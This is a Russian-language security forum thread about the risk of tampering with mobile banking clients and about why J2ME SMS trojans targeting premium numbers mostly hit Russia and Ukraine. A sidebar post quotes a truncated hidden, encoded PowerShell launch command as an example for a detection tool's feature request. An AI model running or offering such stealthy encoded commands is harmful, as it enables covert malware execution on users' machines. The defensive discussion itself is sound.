Перейти к содержанию
Kokunov Aleksey

Вопросы, пожелания и предложения

Recommended Posts

Kokunov Aleksey

Вот я например пользуюсь программками от банков, для работы со своими счетами...

Да, и их помощью нельзя перевести деньки на другой счет (не на свой).... но там есть прекрасная функция оплаты сотовой (и не только) связи...

При этом реально оплатить счет за телефон на 50-60 тыс. рэ :)

Вопрос к Виктору: Можно ли на базе Симбы внедрится в код подобного клиента и например исправить номер телефона и сумму платежа?

А есть еще вэб-банкинг...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor
Вот я например пользуюсь программками от банков, для работы со своими счетами...

Да, и их помощью нельзя перевести деньки на другой счет (не на свой).... но там есть прекрасная функция оплаты сотовой (и не только) связи...

При этом реально оплатить счет за телефон на 50-60 тыс. рэ :)

Алексей, вовремя Вы вспомнили о KMS, как раз на этой неделе начнем бета-тестирование восьмерки, счет уже идет на часы :)

Вопрос к Виктору: Можно ли на базе Симбы внедрится в код подобного клиента и например исправить номер телефона и сумму платежа?

Ну, во-первых, неплохо бы сначала понять, о каком именно клиенте мы говорим, ведь подобных программ уже довольно много и у каждой есть свои особенности. Во-вторых, нужно определиться, о какой версии Симбиан идет речь (на 9.* на неразлоченных смартах вряд ли удастся обойтись без использования капабилити, требующих сертификации). В приципе есть несколько способов подхачить запрос и каждый из них может быть использован злоумышленниками.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Kokunov Aleksey
. В приципе есть несколько способов подхачить запрос и каждый из них может быть использован злоумышленниками.

:)

Мне вот интересно, а почему в "продвинутой" европе и всяких там америках, где очень сильно развита эта часть услуг (интернет-банкинг, смс и т.д.) не слышно сильных воплей? Славяне что ли в основном ковыряют?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor
:)

Мне вот интересно, а почему в "продвинутой" европе и всяких там америках, где очень сильно развита эта часть услуг (интернет-банкинг, смс и т.д.) не слышно сильных воплей? Славяне что ли в основном ковыряют?

Вопить начинают уже после того, как бабахнет, а мы должны идти впереди и прогнозировать, что будет через 3-5 лет. Слышали, что явно с оглядкой на Гугл, Симбиан объявила о cкором открытии исходных кодов операционки? Чувствуете, к чему все идет?!

Вообще, хороший Вы подняли вопрос. Вот скажем, в 2004, придя в ЛК, я прогнозировал скорое появлении смс-тройнов на j2me. Первый появился в 2006, да, спустя почти два года. Мог ли он появится в 2004?! Мог, а мог бы и в 2003... OK, в 2006 появился RedBrowser, кто-нибудь пошевелился?! Нет, большинство говорило - фигня, всего один, на жаве... Прошло еще полтора года, к маю 2008 их было всего 11, в следующем месяце появилось еще столько же, а по итогам года перевалит за сотню. Что будет в следующем году по-моему очевидно. Аналогичная история нас ждет и с другими операционками, Android, например. Пройдет время и бабахнет, а будем ли мы все к этому готовы - зависит от того, как мы подготовимся к этому сейчас.

Что касается авторства - давно мечтаю найти время и самому поковярять сэмплы. Ну очень интересно, под короткие номера каких стран они заточены (территориальня принадлежносить в данном случае определяется элементарно). Что-то мне подсказывает, что подавляющее большинство заточено под бывший союз.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
hEx
Что-то мне подсказывает, что подавляющее большинство заточено под бывший союз.

Так оно и есть. Подавляющее большинство - Россия и Украина.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor
Так оно и есть. Подавляющее большинство - Россия и Украина.

Внимание вопрос: "Почему?"

Есть ли хотя бы один пример предствителя дальнего зарубежья?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
hEx

Вот здесь есть пример использования коротких номеров и в дальнем зарубежье, однако это не мобильный троянец.

З.Ы. Русские биллинговые конторы дают возможность аренды префиксов для номеров, использующихся в дальнем зарубежье.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor
Вот здесь есть пример использования коротких номеров и в дальнем зарубежье, однако это не мобильный троянец.

Не, давайте говорить конкретно о J2ME-троянах, отсылающих смс на платные премиум-номера :)

З.Ы. Русские биллинговые конторы дают возможность аренды префиксов для номеров, использующихся в дальнем зарубежье.

То есть отсутствие смс-троянов зарубежного производства обусловлено там, что западные компании не дают арендовать короткие номера?! :unsure:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
hEx
То есть отсутствие смс-троянов зарубежного производства обусловлено там, что западные компании не дают арендовать короткие номера?! :unsure:

Дают. Надо поподробнее раскопать условия сдачи префиксов и номеров в аренду

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor
Дают. Надо поподробнее раскопать условия сдачи префиксов и номеров в аренду

Внимание, возвращаемся к главному вопросу: "Почему все известные нам трояны заточены под Россию и ближнее зарубежье?"

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×